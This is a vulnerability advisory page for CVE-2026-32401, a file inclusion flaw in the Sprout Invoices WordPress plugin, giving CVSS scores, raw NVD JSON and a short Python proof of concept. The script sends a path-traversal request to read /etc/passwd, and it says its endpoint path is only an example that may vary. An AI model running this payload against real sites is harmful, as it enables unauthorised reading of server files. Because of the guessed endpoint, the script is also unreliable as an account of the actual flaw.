Security Vulnerability Report
中文
CVE-2026-32401 CVSS 7.2 HIGH

CVE-2026-32401

Published: 2026-03-13 19:54:56
Last Modified: 2026-04-22 21:30:26

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in BoldGrid Client Invoicing by Sprout Invoices sprout-invoices allows PHP Local File Inclusion.This issue affects Client Invoicing by Sprout Invoices: from n/a through <= 20.8.9.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Sprout Invoices (Client Invoicing by Sprout Invoices) <= 20.8.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-32401 PoC - Sprout Invoices LFI # Target: WordPress site with vulnerable Sprout Invoices plugin (<=20.8.9) target = sys.argv[1] if len(sys.argv) > 1 else "http://target-site.com" # Path to vulnerable endpoint (example path, actual path may vary) vulnerable_path = "/wp-admin/admin.php?page=si_invoice&action=view&invoice_id=../../../../../../etc/passwd" url = f"{target}{vulnerable_path}" # Basic authentication for high privilege account auth = ("admin_username", "admin_password") print(f"[*] Testing CVE-2026-32401 on {target}") print(f"[*] Target URL: {url}") try: response = requests.get(url, auth=auth, timeout=10) if "root:" in response.text or "daemon:" in response.text: print("[+] VULNERABLE! Local file inclusion confirmed") print("[+] Extracted content:") print(response.text[:500]) elif response.status_code == 200: print("[?] Possible LFI - Manual verification needed") else: print("[-] Not vulnerable or target not reachable") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32401", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:56.160", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in BoldGrid Client Invoicing by Sprout Invoices sprout-invoices allows PHP Local File Inclusion.This issue affects Client Invoicing by Sprout Invoices: from n/a through <= 20.8.9."}, {"lang": "es", "value": "Control inadecuado del nombre de fichero para la declaración include/require en un programa PHP, una vulnerabilidad de 'Inclusión remota de ficheros PHP', en BoldGrid Client Invoicing by Sprout Invoices sprout-invoices permite la inclusión local de ficheros PHP. Este problema afecta a Client Invoicing by Sprout Invoices: desde n/a hasta &lt;= 20.8.9."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/sprout-invoices/vulnerability/wordpress-client-invoicing-by-sprout-invoices-plugin-20-8-9-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}